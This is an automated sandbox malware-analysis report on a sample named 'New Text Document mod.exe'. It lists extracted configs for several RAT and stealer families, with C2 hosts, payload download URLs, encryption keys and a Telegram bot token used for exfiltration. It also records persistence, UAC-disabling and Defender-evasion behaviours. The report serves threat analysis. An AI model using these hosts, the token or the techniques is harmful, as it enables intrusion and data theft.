Resubmissions
25-01-2025 23:53
250125-3w9aqawpap 1025-01-2025 23:45
250125-3r6c9stre1 1025-01-2025 01:01
250125-bc9zcsypbn 1013-01-2025 17:50
250113-wewjza1pes 1013-01-2025 17:32
250113-v4m4fssrgj 10Analysis
-
max time kernel
50s -
max time network
258s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
25-01-2025 23:53
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win11-20241023-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe
Resource
win11-20241007-en
Errors
General
-
Target
New Text Document mod.exe
-
Size
761KB
-
MD5
c6040234ee8eaedbe618632818c3b1b3
-
SHA1
68115f8c3394c782aa6ba663ac78695d2b80bf75
-
SHA256
bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
-
SHA512
a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
-
SSDEEP
12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
vidar
https://t.me/sc1phell
https://steamcommunity.com/profiles/76561199819539662
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Extracted
asyncrat
0.5.7B
System Program
tuna91.duckdns.org:1604
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
system.exe
-
install_folder
%AppData%
Extracted
xworm
5.0
WlO6Om8yfxIARVE4
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/7G6zzQwJ
Extracted
quasar
1.4.1
bot
wexos47815-61484.portmap.host:61484
06e2bb33-968c-4ca7-97dc-f23fbd5c3092
-
encryption_key
8924CB3C9515DA437A37F5AE598376261E5528FC
-
install_name
msinfo32.exe
-
log_directory
Update
-
reconnect_delay
3000
-
startup_key
Discordupdate
-
subdirectory
dll32
Extracted
xworm
3.1
172.86.108.55:7771
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
quasar
1.4.1
VM-KU
adidya354-21806.portmap.host:21806
cf7c4d30-a326-47cc-a5f0-5a19aa014204
-
encryption_key
E50BC33BC56B70B1A2963DE6EA1855A0E0D0FBCE
-
install_name
Windows Shell Interactive.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Shell Interactive
Extracted
asyncrat
A 13
Default
163.172.125.253:333
AsyncMutex_555223
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
192.168.1.79:4782
0.tcp.in.ngrok.io:14296
193.161.193.99:20466
956eafb2-7482-407b-bff4-d2b57a1c3d75
-
encryption_key
EFEBD005E03B8B8669985D9A167E2BEF9FFCA477
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ROBLOX EXECUTOR
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
90faf922-159d-4166-b661-4ba16af8650e
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Extracted
quasar
1.3.0.0
School
gamwtonxristo.ddns.net:1717
QSR_MUTEX_M3Vba1npfJg3Ale25C
-
encryption_key
VtojWKM7f1XyCVdB41wL
-
install_name
comctl32.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Defender Startup Scan
-
subdirectory
Windows Defender
Extracted
asyncrat
0.5.8
Default
2.tcp.eu.ngrok.io:19695
gonq3XlXWgiz
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
stealerium
https://api.telegram.org/bot6926474815:AAFx9tLAnf5OAVQZp2teS3G2_6T1wCP67xM/sendMessage?chat_id=-4224073938
Signatures
-
Asyncrat family
-
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral4/memory/3100-2139-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral4/memory/3100-2317-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral4/memory/3100-2139-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral4/memory/3100-2317-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral4/memory/2116-2384-0x0000000007180000-0x0000000007190000-memory.dmp family_xworm behavioral4/memory/3916-2557-0x0000000000630000-0x000000000066E000-memory.dmp family_xworm behavioral4/memory/2116-2384-0x0000000007180000-0x0000000007190000-memory.dmp family_xworm behavioral4/memory/3916-2557-0x0000000000630000-0x000000000066E000-memory.dmp family_xworm -
Nanocore family
-
Quasar family
-
Quasar payload 14 IoCs
resource yara_rule behavioral4/memory/4792-2523-0x0000000000780000-0x0000000000AA4000-memory.dmp family_quasar behavioral4/memory/5764-2711-0x0000000000C10000-0x0000000000F34000-memory.dmp family_quasar behavioral4/memory/2808-3287-0x0000000000510000-0x0000000000834000-memory.dmp family_quasar behavioral4/memory/1820-3339-0x0000000000630000-0x0000000000954000-memory.dmp family_quasar behavioral4/memory/1548-3443-0x0000000000CE0000-0x0000000000D66000-memory.dmp family_quasar behavioral4/memory/1968-3464-0x0000000000DB0000-0x00000000010D4000-memory.dmp family_quasar behavioral4/memory/1984-3489-0x0000000000880000-0x0000000000BA4000-memory.dmp family_quasar behavioral4/memory/4792-2523-0x0000000000780000-0x0000000000AA4000-memory.dmp family_quasar behavioral4/memory/5764-2711-0x0000000000C10000-0x0000000000F34000-memory.dmp family_quasar behavioral4/memory/2808-3287-0x0000000000510000-0x0000000000834000-memory.dmp family_quasar behavioral4/memory/1820-3339-0x0000000000630000-0x0000000000954000-memory.dmp family_quasar behavioral4/memory/1548-3443-0x0000000000CE0000-0x0000000000D66000-memory.dmp family_quasar behavioral4/memory/1968-3464-0x0000000000DB0000-0x00000000010D4000-memory.dmp family_quasar behavioral4/memory/1984-3489-0x0000000000880000-0x0000000000BA4000-memory.dmp family_quasar -
Stealerium
An open source info stealer written in C# first seen in May 2022.
-
Stealerium family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3560 created 3300 3560 Update.exe 52 PID 3560 created 3300 3560 Update.exe 52 -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Vidar family
-
Xred family
-
Xworm family
-
Adds policy Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run $77-Bitdefender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" $77-Bitdefender.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ApiUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" ApiUpdater.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5404 powershell.exe 5580 powershell.exe 5728 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 25 IoCs
flow pid Process 8 2416 ._cache_Synaptics.exe 80 2416 ._cache_Synaptics.exe 11 3836 ._cache_New Text Document mod.exe 11 3836 ._cache_New Text Document mod.exe 11 3836 ._cache_New Text Document mod.exe 58 2416 ._cache_Synaptics.exe 58 2416 ._cache_Synaptics.exe 9 3836 ._cache_New Text Document mod.exe 13 3836 ._cache_New Text Document mod.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 43 2416 ._cache_Synaptics.exe 6 2416 ._cache_Synaptics.exe 7 3836 ._cache_New Text Document mod.exe 16 3836 ._cache_New Text Document mod.exe 21 3836 ._cache_New Text Document mod.exe 59 2416 ._cache_Synaptics.exe 5 3836 ._cache_New Text Document mod.exe -
Modifies Windows Firewall 2 TTPs 16 IoCs
pid Process 3096 netsh.exe 3296 netsh.exe 5732 netsh.exe 564 netsh.exe 4756 netsh.exe 4980 netsh.exe 388 netsh.exe 5456 netsh.exe 6836 netsh.exe 5496 netsh.exe 3728 netsh.exe 5808 netsh.exe 5072 netsh.exe 916 netsh.exe 5272 netsh.exe 7092 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (0cef7d10d8f459fc)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=950eb78c-2c84-4723-905f-38bbae3d8637&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAYKhdARvbJk2G%2fIBY6xqmJgAAAAACAAAAAAAQZgAAAAEAACAAAABOSz9An3tBO64GBdOYPhrvbARd1iJPf58O%2bAgUrv9i4AAAAAAOgAAAAAIAACAAAABL3DcJRgiZG6uvhlfOCOMwTk1JrGVeYy6DRMNluGQ1KqAEAAAZmbn%2bpd%2bXQNRWRyEkGvzIeRLaEmly4jvCIz35bpJe2RfnPDW8aaKpkw8NY1MpGzo0Z%2b7sNfKV41aGq5SkSuDtwoO3%2bNxkqXmXp6CFaiyJIgo%2fzha5Vt4dzEkzOCwrMHUpUbEn7GI9qCvlcP%2bbj534Wf52VjUEwSbp3mibpSTpu1kGR9omz2vdYXFv%2bOtxB73jInG8lx33g49uJhXZPG9LlH28aoBkoxzxxjkBZw6WTy59T4i6eI4do43rRp1sZCqyIgPfJcvf0qmxfnbjJGDU8g2FWIgDsQmAaeSazUAWe3g3zkkHcDp1kAYOXiE91hzEATbWohMpnUE7bWoxL4eb2S8Ff8RorM0XwlBRfEtAyNlfSonK9rkmTiWMAUk0QH3R6zKxdGA%2f37SgQv5TUZLAwiZGZ55XaecuMQ7gHXOWxwwoNYhF1nwwZVFqGxNeYJsQKILe9DqHf78dZiXbp5r3geS1AMcDt%2bAB7i2PP8LtzKDPUSLppTwBvwbwk2AIyDRiubYuABT2g4NIiwwmPRYgu%2fPkSgKxGxx%2fr47uu%2bQDwGkt8UbkrUCXnskD8b5aYenFzL88Z%2fehI5AS5d37D%2bdo70ILmIZKF1npOyThTpAT3G5%2bxy2kS6Ll4vtPguwX%2bwo3TzA%2f9vgYcQQqMfZqxm1RgMPDCw48utuWGxzC51J1pRTmjzSZ12XtE%2b9awTfxL%2b4P2M3gl1t1jB7redDQ1BPwAzTS%2fNrNSK9ZuzlOpv3BTgMGk8hWcjncx3HCAX6AB%2fg01t8RdZ9Azs024aydrQt5ob0pvG58X7ZVb1vlIBKK0jRjwsCpKafR4wfXYXBGVJE30jZ4puq5lQp52%2f7kOdGc27FNFH3Om5cNsgR9eygeJ%2fdf71d2O4QWziD7WVWu8yzNoH1yrZwZWEgeMgoikxr4XxB2p%2bpRcuaANO6AsZSqPBJCfhImErOSFdwnJ%2bDUpSHKtkQuA0s%2fVQzn1knY%2b%2bxUJY2aUdugi2UKRKXGZCQMcxHr%2brLgC7V%2fEnHvQ%2fmHGHn9yn00vTXZdHTcZJ5SO78Y3iXnnQvxC22cMO7H7eB2jIK4rNRGI7Fw8OZqJ%2bRtslQDxSGECbkbWseeKPrHj8V8ghLuQP5%2fDrjVyrKyF9oj7L46JADr0eXCIZcwCFzET%2bM4bMFrJCsgPW%2bltiMGm8Kt9nOTv41RmCDmCDpiwVM0MFM59BwScd%2f1UCi%2bt9t34AUT9wOCYHwKAKv9LA5Teok9boWZ%2bmfCZXMa8nBBRQnqmFK6N0QDoi6mGlwcGLlQsWvofQmEwNZQ0FDzQk6nFOJOJoS7jJl29Z%2bfezfJFEfWEDeDVa%2b9h9FcT6uETfAkPIgZtWUb09Ek00AyXluWGoJJngENNjBC4yo1FdbMkr3tkvEH5zNivNEK1lYiMbXPNOApc2I9SqyYs3raCVD81rcqowKtZ9LUkBmkkbUIq51stjg%2fW%2fXRv5gZlqkQ69svaHrYK18qrKp3L1CgDgpstw3ctqB2mJbf9QFzHgWxpVJs1Nb3uQsHwHi5OheVtVXP1EOU0jXaKXXqAcgDV7tpBXV%2bI2kJOg8lFkOVZAbO5GHNmkAAAACzCjHv3qdrVNGhNjxZCfBrpzHd%2bLyFdtt7%2frmY2rH4l8cQcXZPuaZQaSMETgIhw7kL2CoJUQOnoCuwDQ1ANhkR&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Drops startup file 16 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk Network.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HasInfo.vbs Update.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe Powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe Powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk Network.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe Powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe Powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe server.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 3836 ._cache_New Text Document mod.exe 3476 Synaptics.exe 2416 ._cache_Synaptics.exe 3320 1.exe 3560 Update.exe 948 test.exe 4340 zoom_invitecode=23884232.zoom.exe 3100 noyjhoadw.exe 3744 ApiUpdater.exe 1556 Surrey.com 4740 windows.exe 4540 T.exe 2116 Enalib.exe 2620 $77-Bitdefender.exe 4960 36.exe 4700 access.exe 1948 system.exe 4808 BQEHIQAG.exe 4816 BQEHIQAG.exe 1820 DBDownloader.exe 2988 DBDownloader.exe 4612 ApiUpdater.exe 4628 99999.exe 1140 22.exe 3828 ScreenConnect.ClientService.exe 1104 server.exe 4792 discordupdate.exe 1540 ScreenConnect.WindowsClient.exe 3916 Network.exe 2620 rea.exe 1916 msinfo32.exe 5084 ScreenConnect.WindowsClient.exe 2404 MSystem32.exe 5172 SharpHound.exe 5284 mod.exe 3668 Server.exe 5512 msinfo32.exe 5500 server.exe 5764 Client.exe 6020 jij.exe 5268 333.exe 1784 Windows Shell Interactive.exe 5792 Network.exe 3836 ._cache_New Text Document mod.exe 3476 Synaptics.exe 2416 ._cache_Synaptics.exe 3320 1.exe 3560 Update.exe 948 test.exe 4340 zoom_invitecode=23884232.zoom.exe 3100 noyjhoadw.exe 3744 ApiUpdater.exe 1556 Surrey.com 4740 windows.exe 4540 T.exe 2116 Enalib.exe 2620 $77-Bitdefender.exe 4960 36.exe 4700 access.exe 1948 system.exe 4808 BQEHIQAG.exe 4816 BQEHIQAG.exe 1820 DBDownloader.exe 2988 DBDownloader.exe -
Loads dropped DLL 64 IoCs
pid Process 3656 MsiExec.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4816 BQEHIQAG.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 3668 MsiExec.exe 4716 MsiExec.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3828 ScreenConnect.ClientService.exe 3476 Synaptics.exe 3476 Synaptics.exe 3656 MsiExec.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4612 rundll32.exe 4816 BQEHIQAG.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 1820 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe 2988 DBDownloader.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" ApiUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" ApiUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" $77-Bitdefender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" $77-Bitdefender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Service = "C:\\Program Files (x86)\\WAN Service\\wansv.exe" MSystem32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network = "C:\\Users\\Admin\\AppData\\Roaming\\Network.exe" Network.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Service = "C:\\Program Files (x86)\\WAN Service\\wansv.exe" jij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe -
Checks whether UAC is enabled 1 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSystem32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jij.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
flow ioc 93 pastebin.com 133 pastebin.com 256 pastebin.com 396 2.tcp.eu.ngrok.io 403 pastebin.com 11 raw.githubusercontent.com 75 pastebin.com 295 pastebin.com 70 pastebin.com 164 pastebin.com 111 pastebin.com 184 pastebin.com 204 pastebin.com 228 pastebin.com 291 pastebin.com 345 pastebin.com 4 raw.githubusercontent.com 86 pastebin.com 289 2.tcp.eu.ngrok.io 317 pastebin.com 125 pastebin.com 178 pastebin.com 272 raw.githubusercontent.com 289 0.tcp.eu.ngrok.io 329 raw.githubusercontent.com 424 pastebin.com 37 pastebin.com 173 pastebin.com 399 pastebin.com 433 pastebin.com 60 pastebin.com 128 pastebin.com 305 pastebin.com 311 pastebin.com 346 raw.githubusercontent.com 358 pastebin.com 372 0.tcp.eu.ngrok.io 385 pastebin.com 43 raw.githubusercontent.com 175 pastebin.com 326 pastebin.com 156 pastebin.com 267 raw.githubusercontent.com 348 raw.githubusercontent.com 349 raw.githubusercontent.com 396 0.tcp.in.ngrok.io 280 pastebin.com 347 raw.githubusercontent.com 251 0.tcp.in.ngrok.io 350 raw.githubusercontent.com 374 pastebin.com 442 pastebin.com 79 pastebin.com 218 pastebin.com 161 pastebin.com 193 pastebin.com 199 pastebin.com 263 pastebin.com 364 pastebin.com 369 raw.githubusercontent.com 53 pastebin.com 121 pastebin.com 188 pastebin.com 206 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 252 ip-api.com 37 ip-api.com -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800300063006500660037006400310030006400380066003400350039006600630029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf server.exe File opened for modification C:\autorun.inf server.exe File created F:\autorun.inf server.exe File opened for modification F:\autorun.inf server.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\system32\dll32\msinfo32.exe msinfo32.exe File opened for modification C:\Windows\system32\dll32 msinfo32.exe File opened for modification C:\Windows\system32\Windows Shell Interactive.exe Windows Shell Interactive.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\hrbjwspz.newcfg ScreenConnect.ClientService.exe File opened for modification C:\Windows\system32\dll32 msinfo32.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\dll32\msinfo32.exe discordupdate.exe File opened for modification C:\Windows\system32\dll32 discordupdate.exe File opened for modification C:\Windows\system32\dll32\msinfo32.exe msinfo32.exe File created C:\Windows\system32\Windows Shell Interactive.exe Client.exe File opened for modification C:\Windows\system32\Windows Shell Interactive.exe Client.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\hrbjwspz.tmp ScreenConnect.ClientService.exe File created C:\Windows\system32\dll32\msinfo32.exe discordupdate.exe File created C:\Windows\SysWOW64\Explower.exe server.exe File opened for modification C:\Windows\SysWOW64\Explower.exe server.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 860 tasklist.exe 3848 tasklist.exe -
Suspicious use of SetThreadContext 10 IoCs
